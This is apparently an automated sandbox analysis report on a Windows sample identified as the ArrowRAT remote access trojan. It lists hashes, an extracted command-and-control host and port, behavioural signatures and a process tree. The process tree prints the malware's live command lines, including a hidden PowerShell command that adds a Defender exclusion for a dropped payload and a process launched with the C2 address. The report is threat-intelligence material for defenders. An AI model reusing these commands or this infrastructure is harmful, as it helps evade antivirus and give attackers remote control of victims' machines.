Overview

overview

10

Static

static

10

d7dea9816b...55.exe

windows7-x64

10

d7dea9816b...55.exe

windows10-2004-x64

10

Analysis

  • max time kernel
    141s
  • max time network
    152s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20230703-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20230703-enlocale:en-usos:windows10-2004-x64system
  • submitted
    31-07-2023 02:40

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    d7dea9816b882cb53d615a3afdf0c955.exe

  • Size

    158KB

  • MD5

    d7dea9816b882cb53d615a3afdf0c955

  • SHA1

    d3bfd91ff74c072028bd747d4f56f17cc55168a5

  • SHA256

    96d3ba07a0486f3b25474af2ea79d09ada281de55ebedb75f32ffdd670c107c6

  • SHA512

    b0881a34616faa65c5f279f5dd1f9e51a951c982046a46afdb109db71dd34c5148db017faf1141ab5a713846d22df463a576c4c274558f56bf624cc703eb0f35

  • SSDEEP

    3072:5bzgH+0OoCthfbEFtbcfjF45gjryKKqH6JY2doszEmQotEPPcfP/NO8Y:5bzge0ODhTEPgnjuIJzo+PPcfP/A8

Score
10/10
arrowratclientpersistencerat

Malware Config

Extracted

Family

arrowrat

Botnet

Client

C2

line-ellis.gl.at.ply.gg:10735

Mutex

nAChhjAnR

Signatures

  • ArrowRat

    Remote access tool with various capabilities first seen in late 2021.

    ratarrowrat
  • Modifies WinLogon for persistence 2 TTPs 1 IoCs
    persistence
  • Modifies Installed Components in the registry 2 TTPs 1 IoCs
    persistence
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Enumerates connected drives 3 TTPs 2 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Program crash 5 IoCs
  • Checks SCSI registry key(s) 3 TTPs 22 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Modifies Internet Explorer settings 1 TTPs 10 IoCs
    adwarespyware
  • Modifies registry class 64 IoCs
  • Suspicious behavior: EnumeratesProcesses 4 IoCs
  • Suspicious use of AdjustPrivilegeToken 24 IoCs
  • Suspicious use of FindShellTrayWindow 51 IoCs
  • Suspicious use of SendNotifyMessage 23 IoCs
  • Suspicious use of SetWindowsHookEx 7 IoCs
  • Suspicious use of WriteProcessMemory 14 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\d7dea9816b882cb53d615a3afdf0c955.exe
    "C:\Users\Admin\AppData\Local\Temp\d7dea9816b882cb53d615a3afdf0c955.exe"
    1⤵
    • Modifies WinLogon for persistence
    • Checks computer location settings
    • Suspicious use of SetThreadContext
    • Modifies registry class
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:3872
    • C:\Windows\explorer.exe
      "C:\Windows\explorer.exe"
      2⤵
      • Modifies Installed Components in the registry
      • Enumerates connected drives
      • Checks SCSI registry key(s)
      • Modifies registry class
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of FindShellTrayWindow
      • Suspicious use of SendNotifyMessage
      PID:3840
    • C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" Client line-ellis.gl.at.ply.gg 10735 nAChhjAnR
      2⤵
        PID:4024
      • C:\Windows\System32\ComputerDefaults.exe
        "C:\Windows\System32\ComputerDefaults.exe"
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:3664
        • C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell.exe
          "PowerShell.exe" -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\LHost\hDvkdxlbo.exe'
          3⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:2752
    • C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
      "C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
      1⤵
      • Modifies registry class
      • Suspicious use of SetWindowsHookEx
      PID:3964
    • C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
      "C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
      1⤵
      • Modifies Internet Explorer settings
      • Modifies registry class
      • Suspicious use of SetWindowsHookEx
      PID:4276
      • C:\Windows\system32\WerFault.exe
        C:\Windows\system32\WerFault.exe -u -p 4276 -s 3760
        2⤵
        • Program crash
        PID:4848
    • C:\Windows\system32\WerFault.exe
      C:\Windows\system32\WerFault.exe -pss -s 404 -p 4276 -ip 4276
      1⤵
        PID:3432
      • C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
        "C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
        1⤵
        • Modifies Internet Explorer settings
        • Modifies registry class
        • Suspicious use of SetWindowsHookEx
        PID:4776
        • C:\Windows\system32\WerFault.exe
          C:\Windows\system32\WerFault.exe -u -p 4776 -s 4048
          2⤵
          • Program crash
          PID:3720
      • C:\Windows\system32\WerFault.exe
        C:\Windows\system32\WerFault.exe -pss -s 452 -p 4776 -ip 4776
        1⤵
          PID:1100
        • C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
          "C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
          1⤵
          • Modifies Internet Explorer settings
          • Modifies registry class
          • Suspicious use of SetWindowsHookEx
          PID:2996
          • C:\Windows\system32\WerFault.exe
            C:\Windows\system32\WerFault.exe -u -p 2996 -s 3568
            2⤵
            • Program crash
            PID:4560
        • C:\Windows\system32\WerFault.exe
          C:\Windows\system32\WerFault.exe -pss -s 536 -p 2996 -ip 2996
          1⤵
            PID:232
          • C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
            "C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
            1⤵
            • Modifies Internet Explorer settings
            • Modifies registry class
            • Suspicious use of SetWindowsHookEx
            PID:1612
            • C:\Windows\system32\WerFault.exe
              C:\Windows\system32\WerFault.exe -u -p 1612 -s 3532
              2⤵
              • Program crash
              PID:5048
          • C:\Windows\system32\WerFault.exe
            C:\Windows\system32\WerFault.exe -pss -s 540 -p 1612 -ip 1612
            1⤵
              PID:3732
            • C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
              "C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
              1⤵
              • Modifies Internet Explorer settings
              • Modifies registry class
              • Suspicious use of SetWindowsHookEx
              PID:4728
              • C:\Windows\system32\WerFault.exe
                C:\Windows\system32\WerFault.exe -u -p 4728 -s 3612
                2⤵
                • Program crash
                PID:1692
            • C:\Windows\system32\WerFault.exe
              C:\Windows\system32\WerFault.exe -pss -s 496 -p 4728 -ip 4728
              1⤵
                PID:640
              • C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
                "C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
                1⤵
                  PID:3084

                Network

                MITRE ATT&CK Enterprise v15

                Replay Monitor

                Loading Replay Monitor...

                Downloads

                • C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\Microsoft\Internet Explorer\DOMStore\7ZZHJ0NR\microsoft.windows[1].xml
                  Filesize

                  97B

                  MD5

                  75fdba27ae111f9312c9b243a5e22d02

                  SHA1

                  0bbbf13546b05600dbeb285609adcff5e12c2e24

                  SHA256

                  62198536b21cc7cad5b396303999bb4ad75ad784e120525be4b8b8a503f05d89

                  SHA512

                  855ad3a011f011fc715020029dfce87fd1812bd6d94b5aafdc731b591fe24c681048009427d22da931fc13a1b7cdbca5e8336a79f03d6e226d9984118f2a306c

                  Download Submit

                • C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\AppIconCache\100\Microsoft_AutoGenerated_{0A6AC72E-ED8C-C16F-38B6-05831557CF24}
                  Filesize

                  36KB

                  MD5

                  8aaad0f4eb7d3c65f81c6e6b496ba889

                  SHA1

                  231237a501b9433c292991e4ec200b25c1589050

                  SHA256

                  813c66ce7dec4cff9c55fb6f809eab909421e37f69ff30e4acaa502365a32bd1

                  SHA512

                  1a83ce732dc47853bf6e8f4249054f41b0dea8505cda73433b37dfa16114f27bfed3b4b3ba580aa9d53c3dcc8d48bf571a45f7c0468e6a0f2a227a7e59e17d62

                  Download Submit

                • C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\AppIconCache\100\{1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}_charmap_exe
                  Filesize

                  36KB

                  MD5

                  406347732c383e23c3b1af590a47bccd

                  SHA1

                  fae764f62a396f2503dd81eefd3c7f06a5fb8e5f

                  SHA256

                  e0a9f5c75706dc79a44d0c890c841b2b0b25af4ee60d0a16a7356b067210038e

                  SHA512

                  18905eaad8184bb3a7b0fe21ff37ed2ee72a3bd24bb90cbfcad222cf09e2fa74e886d5c687b21d81cd3aec1e6c05891c24f67a8f82bafd2aceb0e0dcb7672ce7

                  Download Submit

                • C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133352448772131836.txt
                  Filesize

                  76KB

                  MD5

                  1813dd442ceacc789193d494f5950c47

                  SHA1

                  aefaec9cba5ee871851ce3fc2f2e5a00e3373f19

                  SHA256

                  d5024835c416b9b1f969c5120d1ca847509732b3915133941aa1cefa92930b97

                  SHA512

                  838d5df67f65c04a57fa4be60a4b8a47e3517c01ecf62600cf91c76ce269a83e3677a8ea655e42a8d8f2a11c8d92f8ea0bcdb599a4809e8255eae68049273504

                  Download Submit

                • C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133352448772131836.txt
                  Filesize

                  76KB

                  MD5

                  1813dd442ceacc789193d494f5950c47

                  SHA1

                  aefaec9cba5ee871851ce3fc2f2e5a00e3373f19

                  SHA256

                  d5024835c416b9b1f969c5120d1ca847509732b3915133941aa1cefa92930b97

                  SHA512

                  838d5df67f65c04a57fa4be60a4b8a47e3517c01ecf62600cf91c76ce269a83e3677a8ea655e42a8d8f2a11c8d92f8ea0bcdb599a4809e8255eae68049273504

                  Download Submit

                • C:\Users\Admin\AppData\Local\Packages\microsoft.windows.search_cw5n1h2txyewy\AC\Microsoft\Internet Explorer\DOMStore\7ZZHJ0NR\microsoft.windows[1].xml
                  Filesize

                  97B

                  MD5

                  75fdba27ae111f9312c9b243a5e22d02

                  SHA1

                  0bbbf13546b05600dbeb285609adcff5e12c2e24

                  SHA256

                  62198536b21cc7cad5b396303999bb4ad75ad784e120525be4b8b8a503f05d89

                  SHA512

                  855ad3a011f011fc715020029dfce87fd1812bd6d94b5aafdc731b591fe24c681048009427d22da931fc13a1b7cdbca5e8336a79f03d6e226d9984118f2a306c

                  Download Submit

                • C:\Users\Admin\AppData\Local\Packages\microsoft.windows.search_cw5n1h2txyewy\AC\Microsoft\Internet Explorer\DOMStore\7ZZHJ0NR\microsoft.windows[1].xml
                  Filesize

                  97B

                  MD5

                  75fdba27ae111f9312c9b243a5e22d02

                  SHA1

                  0bbbf13546b05600dbeb285609adcff5e12c2e24

                  SHA256

                  62198536b21cc7cad5b396303999bb4ad75ad784e120525be4b8b8a503f05d89

                  SHA512

                  855ad3a011f011fc715020029dfce87fd1812bd6d94b5aafdc731b591fe24c681048009427d22da931fc13a1b7cdbca5e8336a79f03d6e226d9984118f2a306c

                  Download Submit

                • C:\Users\Admin\AppData\Local\Packages\microsoft.windows.search_cw5n1h2txyewy\AC\Microsoft\Internet Explorer\DOMStore\7ZZHJ0NR\microsoft.windows[1].xml
                  Filesize

                  97B

                  MD5

                  75fdba27ae111f9312c9b243a5e22d02

                  SHA1

                  0bbbf13546b05600dbeb285609adcff5e12c2e24

                  SHA256

                  62198536b21cc7cad5b396303999bb4ad75ad784e120525be4b8b8a503f05d89

                  SHA512

                  855ad3a011f011fc715020029dfce87fd1812bd6d94b5aafdc731b591fe24c681048009427d22da931fc13a1b7cdbca5e8336a79f03d6e226d9984118f2a306c

                  Download Submit

                • C:\Users\Admin\AppData\Local\Packages\microsoft.windows.search_cw5n1h2txyewy\AC\Microsoft\Internet Explorer\DOMStore\7ZZHJ0NR\microsoft.windows[1].xml
                  Filesize

                  97B

                  MD5

                  75fdba27ae111f9312c9b243a5e22d02

                  SHA1

                  0bbbf13546b05600dbeb285609adcff5e12c2e24

                  SHA256

                  62198536b21cc7cad5b396303999bb4ad75ad784e120525be4b8b8a503f05d89

                  SHA512

                  855ad3a011f011fc715020029dfce87fd1812bd6d94b5aafdc731b591fe24c681048009427d22da931fc13a1b7cdbca5e8336a79f03d6e226d9984118f2a306c

                  Download Submit

                • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_lgxgid20.pmp.ps1
                  Filesize

                  60B

                  MD5

                  d17fe0a3f47be24a6453e9ef58c94641

                  SHA1

                  6ab83620379fc69f80c0242105ddffd7d98d5d9d

                  SHA256

                  96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                  SHA512

                  5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

                  Download Submit

                • memory/1612-253-0x0000024AC1CB0000-0x0000024AC1CD0000-memory.dmp

                  Filesize

                  128KB

                  Download

                • memory/1612-256-0x0000024AC1C70000-0x0000024AC1C90000-memory.dmp

                  Filesize

                  128KB

                  Download

                • memory/1612-259-0x0000024AC2080000-0x0000024AC20A0000-memory.dmp

                  Filesize

                  128KB

                  Download

                • memory/2752-188-0x00007FFC2C850000-0x00007FFC2D311000-memory.dmp

                  Filesize

                  10.8MB

                  Download

                • memory/2752-162-0x00000267F97A0000-0x00000267F97B0000-memory.dmp

                  Filesize

                  64KB

                  Download

                • memory/2752-163-0x00000267F97A0000-0x00000267F97B0000-memory.dmp

                  Filesize

                  64KB

                  Download

                • memory/2752-164-0x00000267F97A0000-0x00000267F97B0000-memory.dmp

                  Filesize

                  64KB

                  Download

                • memory/2752-165-0x00000267F97A0000-0x00000267F97B0000-memory.dmp

                  Filesize

                  64KB

                  Download

                • memory/2752-158-0x00000267F97B0000-0x00000267F97D2000-memory.dmp

                  Filesize

                  136KB

                  Download

                • memory/2752-160-0x00007FFC2C850000-0x00007FFC2D311000-memory.dmp

                  Filesize

                  10.8MB

                  Download

                • memory/2996-238-0x00000196A4E00000-0x00000196A4E20000-memory.dmp

                  Filesize

                  128KB

                  Download

                • memory/2996-235-0x00000196A4E40000-0x00000196A4E60000-memory.dmp

                  Filesize

                  128KB

                  Download

                • memory/2996-241-0x00000196A52B0000-0x00000196A52D0000-memory.dmp

                  Filesize

                  128KB

                  Download

                • memory/3840-167-0x0000000003120000-0x0000000003121000-memory.dmp

                  Filesize

                  4KB

                  Download

                • memory/3872-135-0x00007FFC2C850000-0x00007FFC2D311000-memory.dmp

                  Filesize

                  10.8MB

                  Download

                • memory/3872-174-0x00007FFC2C850000-0x00007FFC2D311000-memory.dmp

                  Filesize

                  10.8MB

                  Download

                • memory/3872-139-0x000001D8697C0000-0x000001D8697D0000-memory.dmp

                  Filesize

                  64KB

                  Download

                • memory/3872-133-0x000001D867990000-0x000001D8679BE000-memory.dmp

                  Filesize

                  184KB

                  Download

                • memory/3872-189-0x000001D8697C0000-0x000001D8697D0000-memory.dmp

                  Filesize

                  64KB

                  Download

                • memory/4024-190-0x00000000033B0000-0x00000000033C0000-memory.dmp

                  Filesize

                  64KB

                  Download

                • memory/4024-138-0x00000000058B0000-0x0000000005942000-memory.dmp

                  Filesize

                  584KB

                  Download

                • memory/4024-137-0x0000000075330000-0x0000000075AE0000-memory.dmp

                  Filesize

                  7.7MB

                  Download

                • memory/4024-153-0x0000000006920000-0x0000000006970000-memory.dmp

                  Filesize

                  320KB

                  Download

                • memory/4024-145-0x0000000006660000-0x00000000066C6000-memory.dmp

                  Filesize

                  408KB

                  Download

                • memory/4024-142-0x00000000060B0000-0x0000000006654000-memory.dmp

                  Filesize

                  5.6MB

                  Download

                • memory/4024-140-0x0000000005950000-0x00000000059EC000-memory.dmp

                  Filesize

                  624KB

                  Download

                • memory/4024-185-0x0000000075330000-0x0000000075AE0000-memory.dmp

                  Filesize

                  7.7MB

                  Download

                • memory/4024-134-0x0000000000400000-0x0000000000418000-memory.dmp

                  Filesize

                  96KB

                  Download

                • memory/4024-141-0x00000000033B0000-0x00000000033C0000-memory.dmp

                  Filesize

                  64KB

                  Download

                • memory/4276-181-0x000001F94DBA0000-0x000001F94DBC0000-memory.dmp

                  Filesize

                  128KB

                  Download

                • memory/4276-176-0x000001F94D590000-0x000001F94D5B0000-memory.dmp

                  Filesize

                  128KB

                  Download

                • memory/4276-173-0x000001F94D5D0000-0x000001F94D5F0000-memory.dmp

                  Filesize

                  128KB

                  Download

                • memory/4728-274-0x000001B2DF560000-0x000001B2DF580000-memory.dmp

                  Filesize

                  128KB

                  Download

                • memory/4728-277-0x000001B2DF520000-0x000001B2DF540000-memory.dmp

                  Filesize

                  128KB

                  Download

                • memory/4728-279-0x000001B2DF930000-0x000001B2DF950000-memory.dmp

                  Filesize

                  128KB

                  Download

                • memory/4728-288-0x000001AADE000000-0x000001AADE77A000-memory.dmp

                  Filesize

                  7.5MB

                  Download

                • memory/4776-209-0x0000018B8D8C0000-0x0000018B8D8E0000-memory.dmp

                  Filesize

                  128KB

                  Download

                • memory/4776-207-0x0000018B8D1B0000-0x0000018B8D1D0000-memory.dmp

                  Filesize

                  128KB

                  Download

                • memory/4776-203-0x0000018B8D500000-0x0000018B8D520000-memory.dmp

                  Filesize

                  128KB

                  Download